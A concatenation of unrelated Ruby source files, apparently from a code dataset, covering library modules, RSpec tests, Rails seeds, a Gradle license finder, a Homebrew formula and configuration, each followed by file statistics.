require_relative 'aws-sdk-cloudwatchrum/client'
require_relative 'aws-sdk-cloudwatchrum/errors'
require_relative 'aws-sdk-cloudwatchrum/resource'
require_relative 'aws-sdk-cloudwatchrum/customizations'
# This module provides support for CloudWatch RUM. This module is available in the
# `aws-sdk-cloudwatchrum` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# cloud_watch_rum = Aws::CloudWatchRUM::Client.new
# resp = cloud_watch_rum.create_app_monitor(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from CloudWatch RUM are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::CloudWatchRUM::Errors::ServiceError
# # rescues all CloudWatch RUM API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::CloudWatchRUM
GEM_VERSION = '1.3.0'
end
| 26.296296 | 82 | 0.753521 |
21023d041bc9729d29a4190b137675f930155ad8 | 3,155 | require 'spec_helper'
require 'date'
describe CopticVariableFeasts do
it "2014 big fast should return 2014.02.24" do
expect(CopticVariableFeasts::big_fast_start_date(2014)).to eq(Date.new(2014,2,24))
end
it "2011 big fast should return 2011.02.28" do
expect(CopticVariableFeasts::big_fast_start_date(2011)).to eq(Date.new(2011,2,28))
end
it "2008 big fast should return 2008.03.03" do
expect(CopticVariableFeasts::big_fast_start_date(2008)).to eq(Date.new(2008,3,3))
end
it "2014 Jonah fast should return 2014.02.10" do
expect(CopticVariableFeasts::jonah_fast_start_date(2014)).to eq(Date.new(2014,2,10))
end
it "2011 Jonah fast should return 2011.02.14" do
expect(CopticVariableFeasts::jonah_fast_start_date(2011)).to eq(Date.new(2011,2,14))
end
it "2008 Jonah fast should return 2008.02.18" do
expect(CopticVariableFeasts::jonah_fast_start_date(2008)).to eq(Date.new(2008,2,18))
end
it "2014 Messngers fast should return 2014.06.09" do
expect(CopticVariableFeasts::messengers_fast_start_date(2014)).to eq(Date.new(2014,6,9))
end
it "2011 Messngers fast should return 2011.06.13" do
expect(CopticVariableFeasts::messengers_fast_start_date(2011)).to eq(Date.new(2011,6,13))
end
it "2008 Messngers fast should return 2008.06.16" do
expect(CopticVariableFeasts::messengers_fast_start_date(2008)).to eq(Date.new(2008,6,16))
end
it "2014 Messngers feast should return 2014.07.12" do
expect(CopticVariableFeasts::messengers_feast_date(2014)).to eq(Date.new(2014,7,12))
end
it "2011 Messngers feast should return 2011.07.12" do
expect(CopticVariableFeasts::messengers_feast_date(2011)).to eq(Date.new(2011,7,12))
end
it "2008 Messngers feast should return 2008.07.12" do
expect(CopticVariableFeasts::messengers_feast_date(2008)).to eq(Date.new(2008,7,12))
end
it "2014 Thomas Sunday return 2014.04.27" do
expect(CopticVariableFeasts::thomas_sunday(2014)).to eq(Date.new(2014,4,27))
end
it "2011 Thomas Sunday should return 2011.05.01" do
expect(CopticVariableFeasts::thomas_sunday(2011)).to eq(Date.new(2011,5,1))
end
it "2007 ascension feast should return 2007.5.17" do
expect(CopticVariableFeasts::ascension_feast(2007)).to eq(Date.new(2007,5,17))
end
it "2008 ascension feast should return 2008.6.5" do
expect(CopticVariableFeasts::ascension_feast(2008)).to eq(Date.new(2008,6,5))
end
it "2011 ascension feast should return 2011.6.2" do
expect(CopticVariableFeasts::ascension_feast(2011)).to eq(Date.new(2011,6,2))
end
it "2014 ascension feast should return 2014.5.29" do
expect(CopticVariableFeasts::ascension_feast(2014)).to eq(Date.new(2014,5,29))
end
it "2010 ascension feast should return 2010.5.13" do
expect(CopticVariableFeasts::ascension_feast(2010)).to eq(Date.new(2010,5,13))
end
it "2014 pentecost feast should return 2014.6.8" do
expect(CopticVariableFeasts::pentecost_feast(2014)).to eq(Date.new(2014,6,8))
end
it "2013 pentecost feast should return 2013.6.23" do
expect(CopticVariableFeasts::pentecost_feast(2013)).to eq(Date.new(2013,6,23))
end
end
| 34.67033 | 93 | 0.742314 |
03290272a8d82f6219bf5df93c85e3418bf9f449 | 3,038 | # frozen_string_literal: true
require 'xmlsimple'
require 'with_env'
require 'license_finder/package_utils/gradle_dependency_finder'
module LicenseFinder
class Gradle < PackageManager
def initialize(options = {})
super
@command = options[:gradle_command] || package_management_command
@include_groups = options[:gradle_include_groups]
end
def current_packages
WithEnv.with_env('TERM' => 'dumb') do
command = "#{@command} downloadLicenses"
_stdout, stderr, status = Dir.chdir(project_path) { Cmd.run(command) }
raise "Command '#{command}' failed to execute: #{stderr}" unless status.success?
dependencies = GradleDependencyFinder.new(project_path).dependencies
packages = dependencies.flat_map do |xml_file|
options = { 'GroupTags' => { 'dependencies' => 'dependency' } }
contents = XmlSimple.xml_in(xml_file, options).fetch('dependency', [])
contents.map do |dep|
GradlePackage.new(dep, logger: logger, include_groups: @include_groups)
end
end
packages.uniq
end
end
def package_management_command
if Platform.windows?
wrapper = 'gradlew.bat'
gradle = 'gradle.bat'
else
wrapper = './gradlew'
gradle = 'gradle'
end
File.exist?(File.join(project_path, wrapper)) ? wrapper : gradle
end
def project_root?
active? && root_module?
end
private
def root_module?
return false if project_path.to_s.include?('buildSrc')
command = "#{package_management_command} -Dorg.gradle.jvmargs=-Xmx6144m properties | grep 'parent: '"
stdout, stderr, status = Dir.chdir(project_path) { Cmd.run(command) }
if stderr&.include?('not part of the build defined by settings file')
Dir.chdir(project_path) do
Cmd.run('touch settings.gradle')
stdout, stderr, status = Cmd.run(command)
Cmd.run('rm settings.gradle')
end
end
raise "Command '#{command}' failed to execute in #{project_path}: #{stderr}" unless status.success?
root_project_name = stdout.gsub(/\s|parent:|\n/, '')
root_project_name == 'null'
end
def detected_package_path
alternate_build_file = build_file_from_settings(project_path)
return alternate_build_file if alternate_build_file
build_gradle_file
end
def build_gradle_file
kotlin_gradle_path = project_path.join('build.gradle.kts')
return kotlin_gradle_path if File.exist? kotlin_gradle_path
project_path.join('build.gradle')
end
def build_file_from_settings(project_path)
settings_gradle_path = project_path.join 'settings.gradle'
return nil unless File.exist? settings_gradle_path
settings_gradle = File.read settings_gradle_path
match = /rootProject.buildFileName = ['"](?<build_file>.*)['"]/.match settings_gradle
return nil unless match
project_path.join match[:build_file]
end
end
end
| 30.38 | 107 | 0.66919 |
6afd8f40cf703e1f77401282a358a63d4dcd3803 | 1,980 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the bin/rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
Climb.create( nickname: "Pink Slab", climb_type: "Boulder", grade:"V2", color:"Pink", location: "PRG East Falls, Cube Face ", notes:"Starts at the arete and continues to the top of the middle of the wall")
Climb.create( nickname: "Blue Overhang", climb_type: "Boulder", grade:"V1", color:"Blue", location: "PRG East Falls, Shipwreck Starbord ", notes:"Lots of sloper holds. Keep hips low to keep from slipping off")
Climb.create( nickname: "The Destroyer", climb_type: "Boulder", grade:"V3", color:"Green", location: "PRG East Falls, Mushroom Front ", notes:"Start is very crunched up, with a huge mantle move to finish it out. Watch for the heel hook")
Climb.create( nickname: "Try Your Best", climb_type: "Lead", grade:"5.9", color:"Purple", location: "PRG East Falls, Route 12 ", notes:"Really short, but small crimps the whole way.")
Climb.create( nickname: "Cakewalk", climb_type: "Top-Rope", grade:"5.4", color:"Red", location: "PRG East Falls, Route 6 ", notes:"Easily the easiest climb in the gym")
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "Very techincal Slab", climb_id: 1)
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "Not as hard the second time", climb_id: 1)
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "Cakewalk", climb_id: 5)
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "Hardest climb i've done so far.", climb_id: 3)
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "My fingers hurt", climb_id: 4)
Send.create(climber: "Eben Eleazer", date:Date.today, notes: "Idk why I did it twice", climb_id: 5) | 90 | 238 | 0.720707 |
7abbd74745ccfbcd4a913a34d920f7ffe06ecea7 | 6,394 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ nome: 'Star Wars' }, { nome: 'Lord of the Rings' }])
# Character.create(nome: 'Luke', movie: movies.first)
Categoria.create( nome: "Alimentos e Bebidas")
Categoria.create( nome: "Arte e Antiguidades")
Categoria.create( nome: "Artigos Religiosos")
Categoria.create( nome: "Assinaturas e Revistas")
Categoria.create( nome: "Automóveis e Veículos")
Categoria.create( nome: "Bebês e Cia")
Categoria.create( nome: "Blu-Ray")
Categoria.create( nome: "Brindes / Materiais Promocionais")
Categoria.create( nome: "Brinquedos e Games")
Categoria.create( nome: "Casa e Decoração")
Categoria.create( nome: "CDs")
Categoria.create( nome: "Colecionáveis")
Categoria.create( nome: "Compras Coletivas")
Categoria.create( nome: "Construção e Ferramentas")
Categoria.create( nome: "Cosméticos e Perfumaria")
Categoria.create( nome: "Cursos e Educação")
Categoria.create( nome: "Discos de Vinil")
Categoria.create( nome: "DVDs")
Categoria.create( nome: "Eletrodomésticos")
Categoria.create( nome: "Eletrônicos")
Categoria.create( nome: "Emissoras de Rádio")
Categoria.create( nome: "Emissoras de Televisão")
Categoria.create( nome: "Empregos")
Categoria.create( nome: "Empresas de Telemarketing")
Categoria.create( nome: "Esporte e Lazer")
Categoria.create( nome: "Fitas K7 Gravadas")
Categoria.create( nome: "Flores, Cestas e Presentes")
Categoria.create( nome: "Fotografia")
Categoria.create( nome: "HD-DVD")
Categoria.create( nome: "Igrejas / Templos / Instituições Religiosas")
Categoria.create( nome: "Indústria, Comércio e Negócios")
Categoria.create( nome: "Infláveis Promocionais")
Categoria.create( nome: "Informática")
Categoria.create( nome: "Ingressos")
Categoria.create( nome: "Instrumentos Musicais")
Categoria.create( nome: "Joalheria")
Categoria.create( nome: "Lazer")
Categoria.create( nome: "LD")
Categoria.create( nome: "Livros")
Categoria.create( nome: "MD")
Categoria.create( nome: "Moda e Acessórios")
Categoria.create( nome: "Motéis")
Categoria.create( nome: "Música Digital")
Categoria.create( nome: "Natal")
Categoria.create( nome: "Negócios e Oportunidades")
Categoria.create( nome: "Outros Serviços")
Categoria.create( nome: "Outros Serviços de Avaliação")
Categoria.create( nome: "Papelaria e Escritório")
Categoria.create( nome: "Páscoa")
Categoria.create( nome: "Pet Shop")
Categoria.create( nome: "Saúde")
Categoria.create( nome: "Serviço Advocaticios")
Categoria.create( nome: "Serviço de Distribuição de Jornais / Revistas")
Categoria.create( nome: "Serviços Administrativos")
Categoria.create( nome: "Serviços Artísticos")
Categoria.create( nome: "Serviços de Abatedouros / Matadouros")
Categoria.create( nome: "Serviços de Aeroportos")
Categoria.create( nome: "Serviços de Agências")
Categoria.create( nome: "Serviços de Aluguel / Locação")
Categoria.create( nome: "Serviços de Armazenagem")
Categoria.create( nome: "Serviços de Assessorias")
Categoria.create( nome: "Serviços de Assistência Técnica / Instalações")
Categoria.create( nome: "Serviços de Associações")
Categoria.create( nome: "Serviços de Bancos de Sangue")
Categoria.create( nome: "Serviços de Bibliotecas")
Categoria.create( nome: "Serviços de Cartórios")
Categoria.create( nome: "Serviços de Casas Lotéricas")
Categoria.create( nome: "Serviços de Confecções")
Categoria.create( nome: "Serviços de Consórcios")
Categoria.create( nome: "Serviços de Consultorias")
Categoria.create( nome: "Serviços de Cooperativas")
Categoria.create( nome: "Serviços de Despachante")
Categoria.create( nome: "Serviços de Engenharia")
Categoria.create( nome: "Serviços de Estacionomentos")
Categoria.create( nome: "Serviços de Estaleiros")
Categoria.create( nome: "Serviços de Exportação / Importação")
Categoria.create( nome: "Serviços de Geólogos")
Categoria.create( nome: "Serviços de joalheiros")
Categoria.create( nome: "Serviços de Leiloeiros")
Categoria.create( nome: "Serviços de limpeza")
Categoria.create( nome: "Serviços de Loja de Conveniência")
Categoria.create( nome: "Serviços de Mão de Obra")
Categoria.create( nome: "Serviços de Órgão Públicos")
Categoria.create( nome: "Serviços de Pesquisas")
Categoria.create( nome: "Serviços de Portos")
Categoria.create( nome: "Serviços de Saúde / Bem Estar")
Categoria.create( nome: "Serviços de Seguradoras")
Categoria.create( nome: "Serviços de Segurança")
Categoria.create( nome: "Serviços de Sinalização")
Categoria.create( nome: "Serviços de Sindicatos / Federações")
Categoria.create( nome: "Serviços de Traduções")
Categoria.create( nome: "Serviços de Transporte")
Categoria.create( nome: "Serviços de Utilidade Pública")
Categoria.create( nome: "Serviços em Agricultura / Pecuária / Piscicultura")
Categoria.create( nome: "Serviços em Alimentação")
Categoria.create( nome: "Serviços em Arte")
Categoria.create( nome: "Serviços em Cine / Foto / Som")
Categoria.create( nome: "Serviços em Comunicação")
Categoria.create( nome: "Serviços em Construção")
Categoria.create( nome: "Serviços em Ecologia / Meio Ambiente")
Categoria.create( nome: "Serviços em Eletroeletrônica / Metal Mecânica")
Categoria.create( nome: "Serviços em Festas / Eventos")
Categoria.create( nome: "Serviços em Informática")
Categoria.create( nome: "Serviços em Internet")
Categoria.create( nome: "Serviços em Jóias / Relógios / Óticas")
Categoria.create( nome: "Serviços em Telefonia")
Categoria.create( nome: "Serviços em Veículos")
Categoria.create( nome: "Serviços Esotéricos / Místicos")
Categoria.create( nome: "Serviços Financeiros")
Categoria.create( nome: "Serviços Funerários")
Categoria.create( nome: "Serviços Gerais")
Categoria.create( nome: "Serviços Gráficos / Editoriais")
Categoria.create( nome: "Serviços para Animais")
Categoria.create( nome: "Serviços para Deficientes")
Categoria.create( nome: "Serviços para Escritórios")
Categoria.create( nome: "Serviços para Roupas")
Categoria.create( nome: "Serviços Socias / Assistenciais")
Categoria.create( nome: "Sex Shop")
Categoria.create( nome: "Shopping Centers")
Categoria.create( nome: "Tabacaria")
Categoria.create( nome: "Tarifas Bancárias")
Categoria.create( nome: "Tarifas Telefônicas")
Categoria.create( nome: "Telefonia")
Categoria.create( nome: "Turismo") | 48.075188 | 111 | 0.766969 |
e835a51a1863a5c501ce7b0ff59ec3734d027e1c | 3,957 | # frozen_string_literal: true
require "spec_helper"
require "dependabot/dependency"
require "dependabot/dependency_file"
require "dependabot/file_updaters/php/composer"
require_relative "../shared_examples_for_file_updaters"
RSpec.describe Dependabot::FileUpdaters::Php::Composer do
it_behaves_like "a dependency file updater"
let(:updater) do
described_class.new(
dependency_files: files,
dependencies: [dependency],
credentials: credentials
)
end
let(:credentials) do
[{
"type" => "git_source",
"host" => "github.com",
"username" => "x-access-token",
"password" => "token"
}]
end
let(:files) { [composer_json, lockfile] }
let(:composer_json) do
Dependabot::DependencyFile.new(
name: "composer.json",
content: fixture("php", "composer_files", manifest_fixture_name)
)
end
let(:lockfile) do
Dependabot::DependencyFile.new(
name: "composer.lock",
content: fixture("php", "lockfiles", lockfile_fixture_name)
)
end
let(:manifest_fixture_name) { "exact_version" }
let(:lockfile_fixture_name) { "exact_version" }
let(:dependency) do
Dependabot::Dependency.new(
name: "monolog/monolog",
version: "1.22.1",
requirements: requirements,
previous_version: "1.0.1",
previous_requirements: previous_requirements,
package_manager: "composer"
)
end
let(:requirements) do
[{
file: "composer.json",
requirement: "1.22.1",
groups: [],
source: nil
}]
end
let(:previous_requirements) do
[{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}]
end
let(:tmp_path) { Dependabot::SharedHelpers::BUMP_TMP_DIR_PATH }
before { Dir.mkdir(tmp_path) unless Dir.exist?(tmp_path) }
describe "#updated_dependency_files" do
subject(:updated_files) { updater.updated_dependency_files }
it "doesn't store the files permanently or output to stdout" do
expect { expect { updated_files }.to_not(output.to_stdout) }.
to_not(change { Dir.entries(tmp_path) })
end
it "returns DependencyFile objects" do
updated_files.each { |f| expect(f).to be_a(Dependabot::DependencyFile) }
expect(updated_files.count).to eq(2)
end
describe "the updated composer_file" do
let(:files) { [composer_json] }
subject(:updated_manifest_content) do
updated_files.find { |f| f.name == "composer.json" }.content
end
context "if no files have changed" do
let(:requirements) { previous_requirements }
it "raises a helpful error" do
expect { updater.updated_dependency_files }.
to raise_error("No files have changed!")
end
end
context "when the manifest has changed" do
it "includes the new requirement" do
expect(described_class::ManifestUpdater).
to receive(:new).
with(dependencies: [dependency], manifest: composer_json).
and_call_original
expect(updated_manifest_content).
to include("\"monolog/monolog\" : \"1.22.1\"")
expect(updated_manifest_content).
to include("\"symfony/polyfill-mbstring\": \"1.0.1\"")
end
end
end
describe "the updated lockfile" do
subject(:updated_lockfile_content) do
updated_files.find { |f| f.name == "composer.lock" }.content
end
it "updates the dependency version in the lockfile" do
expect(described_class::LockfileUpdater).
to receive(:new).
with(
credentials: credentials,
dependencies: [dependency],
dependency_files: files
).
and_call_original
expect(updated_lockfile_content).to include("\"version\": \"1.22.1\"")
expect(updated_lockfile_content).to include("\"prefer-stable\": false")
end
end
end
end
| 28.673913 | 79 | 0.638615 |
aca6c41ccf44f548fb80a7d01d16bbda9b9f7090 | 347 | # this is used in config/environments/production.rb.
#don't wanna use NewRelic -Iratu
env "RAILS_LOG_TO_STDOUT", "true"
set :output, "log/whenever.log"
every :hour do
rake "maintenance:hourly"
end
every :day do
rake "maintenance:daily"
end
every :sunday do
rake "maintenance:weekly"
end
every :month do
rake "maintenance:monthly"
end
| 15.772727 | 52 | 0.743516 |
f7fc72a03f7bdf479c068ecb9483ccd46d918144 | 2,783 | # Redmine - project management software
# Copyright (C) 2006-2014 Jean-Philippe Lang
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
require File.expand_path('../../../../../test_helper', __FILE__)
require 'redmine/field_format'
class Redmine::VersionFieldFormatTest < ActionView::TestCase
fixtures :projects, :versions, :trackers
def test_version_status_should_reject_blank_values
field = IssueCustomField.new(:name => 'Foo', :field_format => 'version', :version_status => ["open", ""])
field.save!
assert_equal ["open"], field.version_status
end
def test_existing_values_should_be_valid
field = IssueCustomField.create!(:name => 'Foo', :field_format => 'version', :is_for_all => true, :trackers => Tracker.all)
project = Project.generate!
version = Version.generate!(:project => project, :status => 'open')
issue = Issue.generate!(:project_id => project.id, :tracker_id => 1, :custom_field_values => {field.id => version.id})
field.version_status = ["open"]
field.save!
issue = Issue.order('id DESC').first
assert_include [version.name, version.id.to_s], field.possible_custom_value_options(issue.custom_value_for(field))
assert issue.valid?
end
def test_possible_values_options_should_return_project_versions
field = IssueCustomField.new(:field_format => 'version')
project = Project.find(1)
expected = project.shared_versions.sort.map(&:name)
assert_equal expected, field.possible_values_options(project).map(&:first)
end
def test_possible_values_options_should_return_project_versions_with_selected_status
field = IssueCustomField.new(:field_format => 'version', :version_status => ["open"])
project = Project.find(1)
expected = project.shared_versions.sort.select {|v| v.status == "open"}.map(&:name)
assert_equal expected, field.possible_values_options(project).map(&:first)
end
def test_cast_value_should_not_raise_error_when_array_contains_value_casted_to_nil
field = IssueCustomField.new(:field_format => 'version')
assert_nothing_raised do
field.cast_value([1,2, 42])
end
end
end
| 41.537313 | 127 | 0.743083 |
bb937a708c131dfe96e633fcbcc8e01187531dc7 | 2,387 | require 'set'
require 'mach'
module ProcessShared
module Mach
include ::Mach
# The set of ports that should be shared to forked child
# processes.
#
# FIXME: protect with (original ruby) mutex?
def self.shared_ports
@shared_ports ||= Set.new
end
def self.after_fork_child
parent_port = Task.self.get_bootstrap_port
# give parent permission to send to child's task port
Task.self.copy_send(parent_port)
# create a second port and give the parent permission to send
port = Port.new
port.insert_right(:make_send)
port.copy_send(parent_port)
# parent copies sem, mutex port permissions directly to child
# task port
# wait for parent to send orig bootstrap port
orig_bootstrap = port.receive_right
Task.self.set_special_port(:bootstrap, orig_bootstrap)
end
def self.after_fork_parent(port)
child_task_port = port.receive_right
shared_ports.each do |p|
p.insert_right(:copy_send, :ipc_space => child_task_port)
end
child_port = port.receive_right
::Mach::bootstrap_port.copy_send(child_port)
end
end
end
module Kernel
# Override to call Process::fork.
def self.fork(*args, &block)
Process.fork(*args, &block)
end
def fork(*args, &block)
Process.fork(*args, &block)
end
end
module Process
class << self
unless respond_to? :__mach_original_fork__
alias_method :__mach_original_fork__, :fork
end
# Override to first copy all shared ports (semaphores, etc.) from
# parent process to child process.
def fork
# make a port for receiving message from child
port = Mach::Port.new
port.insert_right(:make_send)
Mach::Task.self.set_bootstrap_port(port)
if block_given?
pid = __mach_original_fork__ do
ProcessShared::Mach.after_fork_child
yield
end
ProcessShared::Mach.after_fork_parent(port)
pid
else
if pid = __mach_original_fork__
ProcessShared::Mach.after_fork_parent(port)
pid
else
ProcessShared::Mach.after_fork_child
nil
end
end
end
end
end
require 'mach/time_spec'
require 'process_shared/time_spec'
# Monkey patch to add #add_seconds! method
Mach::TimeSpec.send(:include, ProcessShared::TimeSpec)
| 24.357143 | 69 | 0.668622 |
1a3d6dd58cd69553f6aa7fdeec3f3ace1697cf41 | 121 | # frozen_string_literal: true
module Bitaculous
module Thorify # :nodoc:
require_relative 'thorify/task'
end
end | 17.285714 | 35 | 0.760331 |
912fda30ade4e1e8351581e247bbaca316f3cad2 | 2,688 | # frozen_string_literal: true
require './lib/arena_slack/api/arena'
require './lib/arena_slack/api/slack'
require './lib/arena_slack/arena_commented'
RSpec.describe 'Arena comment event' do
it 'returns a block title for image blocks' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { true }
allow(story).to receive_message_chain('target.source') { 'Block Source' }
allow(story).to receive_message_chain('target.title') { 'Block Title' }
allow(story).to receive_message_chain('target.content') { 'Block Content' }
comment_item = ArenaCommentedItem.new(story, @arena_url).block_title
expect(comment_item).to eq('Block Title')
end
it 'returns a block title for image blocks with no source' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { true }
allow(story).to receive_message_chain('target.source') { nil }
allow(story).to receive_message_chain('target.title') { 'Block Title' }
comment_item = ArenaCommentedItem.new(story, @arena_url).block_title
expect(comment_item).to eq('Block Title')
end
it 'returns target content for everything else' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { false }
allow(story).to receive_message_chain('target.source') { nil }
allow(story).to receive_message_chain('target.content') { 'Block Content' }
comment_item = ArenaCommentedItem.new(story, @arena_url).block_title
expect(comment_item).to eq('Block Content')
end
it 'returns a block thumbnail' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { true }
allow(story).to receive_message_chain('target.image.display.url') { 'Image Link' }
comment_item = ArenaCommentedItem.new(story, @arena_url).block_thumb
expect(comment_item).to eq('Image Link')
end
it 'returns a link to commented block' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { false }
allow(story).to receive_message_chain('target.id') { 100 }
comment_item = ArenaCommentedItem.new(story, 'https://www.are.na/').block_link
expect(comment_item).to eq('https://www.are.na/block/100')
end
it 'returns an image for a commented block' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { true }
allow(story).to receive_message_chain('target.source.url') { 'https://wwww.block-source.com/source-url' }
comment_item = ArenaCommentedItem.new(story, @arena_url).block_link
expect(comment_item).to eq('https://wwww.block-source.com/source-url')
end
end
| 44.8 | 109 | 0.721726 |
87e24051b652aa39f074e57e987e4c227b7aa2a7 | 1,272 | # frozen-string-literal: true
#
# The any_not_empty extension changes the behavior of Dataset#any?
# if called without a block. By default, this method uses the
# standard Enumerable behavior of enumerating results and seeing
# if any result is not false or nil. With this extension, it
# just checks whether the dataset is empty. This approach can
# be much faster if the dataset is currently large.
#
# DB[:table].any?
# # SELECT * FROM table
#
# DB[:table].extension(:any_not_empty).any?
# # SELECT 1 as one FROM table LIMIT 1
#
# You can load this extension into specific datasets:
#
# ds = DB[:table]
# ds = ds.extension(:any_not_empty)
#
# Or you can load it into all of a database's datasets, which
# is probably the desired behavior if you are using this extension:
#
# DB.extension(:any_not_empty)
#
# Note that this can result in any? returning a different result if
# the dataset has a row_proc that can return false or nil.
#
# Related module: Sequel::AnyNotEmpty
#
module Sequel
module AnyNotEmpty
# If a block is not given, return whether the dataset is not empty.
def any?
if defined?(yield)
super
else
!empty?
end
end
end
Dataset.register_extension(:any_not_empty, AnyNotEmpty)
end
| 27.652174 | 71 | 0.709906 |
1a0f17040e76ad2573761ad3f75b684600a77917 | 3,230 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::KeyVault::V2015_06_01
module Models
#
# The certificate import parameters
#
class CertificateImportParameters
include MsRestAzure
# @return [String] Base64 encoded representation of the certificate
# object to import. This certificate needs to contain the private key.
attr_accessor :base64encoded_certificate
# @return [String] If the private key in base64EncodedCertificate is
# encrypted, the password used for encryption
attr_accessor :password
# @return [CertificatePolicy] The management policy for the certificate
attr_accessor :certificate_policy
# @return [CertificateAttributes] The attributes of the certificate
# (optional)
attr_accessor :certificate_attributes
# @return [Hash{String => String}] Application-specific metadata in the
# form of key-value pairs
attr_accessor :tags
#
# Mapper for CertificateImportParameters class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'CertificateImportParameters',
type: {
name: 'Composite',
class_name: 'CertificateImportParameters',
model_properties: {
base64encoded_certificate: {
client_side_validation: true,
required: true,
serialized_name: 'value',
type: {
name: 'String'
}
},
password: {
client_side_validation: true,
required: false,
serialized_name: 'pwd',
type: {
name: 'String'
}
},
certificate_policy: {
client_side_validation: true,
required: false,
serialized_name: 'policy',
type: {
name: 'Composite',
class_name: 'CertificatePolicy'
}
},
certificate_attributes: {
client_side_validation: true,
required: false,
serialized_name: 'attributes',
type: {
name: 'Composite',
class_name: 'CertificateAttributes'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
}
}
}
}
end
end
end
end
| 30.761905 | 77 | 0.514551 |
b90f059e6758a21f7430bfa1a1c3b217f1ad0fcb | 1,118 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module Scaffolding
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Do not swallow errors in after_commit/after_rollback callbacks.
config.active_record.raise_in_transactional_callbacks = true
end
end
| 41.407407 | 99 | 0.734347 |
08e1740022acb5c1f52eb611f7a9f97e37705666 | 1,764 | class Flex < Formula
desc "Fast Lexical Analyzer, generates Scanners (tokenizers)"
homepage "https://github.com/westes/flex"
url "https://github.com/westes/flex/releases/download/v2.6.4/flex-2.6.4.tar.gz"
sha256 "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c45ee995"
bottle do
sha256 "0abf12786daea0fb1be796e24f41163f41943eb3dfb7ba71e4c09f1821083c11" => :high_sierra
sha256 "89fb9ae2ac9be0f60706f40379cdfa51ced78f1638ac8729bc0074e4fcde70cf" => :sierra
sha256 "95c2da56e5487b53ee4afe3ed52a7f59ffe86df4508768b3e48ef042d66e6cc1" => :el_capitan
sha256 "c8aaca29a77a6b3e2383f7d80b12eccbbf131162e5157a4a320117d4c564a4bf" => :yosemite
sha256 "428698b422383860d697f3ef5e5b91ffc4d0b390b29d5b0c5ab7faee67f299d2" => :x86_64_linux # glibc 2.19
end
keg_only :provided_by_osx, "some formulae require a newer version of flex"
depends_on "help2man" => :build
depends_on "gettext"
unless OS.mac?
depends_on "m4"
depends_on "bison" => :build
end
def install
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--enable-shared",
"--prefix=#{prefix}"
system "make", "install"
bin.install_symlink "flex" => "lex" unless OS.mac?
end
test do
(testpath/"test.flex").write <<~EOS
CHAR [a-z][A-Z]
%%
{CHAR}+ printf("%s", yytext);
[ \\t\\n]+ printf("\\n");
%%
int main()
{
yyin = stdin;
yylex();
}
EOS
system "#{bin}/flex", "test.flex"
system ENV.cc, "lex.yy.c", "-L#{lib}", "-lfl", "-o", "test"
assert_equal shell_output("echo \"Hello World\" | ./test"), <<~EOS
Hello
World
EOS
end
end
| 32.666667 | 107 | 0.646259 |
1cb3e9779ac443524d4aea91dfcd07d6957f4516 | 2,627 | require_relative 'shared_network_manager_context'
shared_examples :shared_examples_for_cloud_network_controller do |providers|
include CompressedIds
render_views
before :each do
stub_user(:features => :all)
setup_zone
end
providers.each do |t|
context "for #{t}" do
include_context :shared_network_manager_context, t
describe "#show_list" do
it "renders index" do
get :index
expect(response.status).to eq(302)
expect(response).to redirect_to(:action => 'show_list')
end
it "renders show_list" do
# TODO(lsmola) figure out why I have to mock pdf available here, but not in other Manager's lists
allow(PdfGenerator).to receive_messages(:available? => false)
session[:settings] = {:default_search => 'foo',
:views => {},
:perpage => {:list => 10}}
get :show_list
expect(response.status).to eq(200)
expect(response.body).to_not be_empty
end
end
describe "#show" do
it "renders show screen" do
get :show, :params => {:id => @cloud_network.id}
expect(response.status).to eq(200)
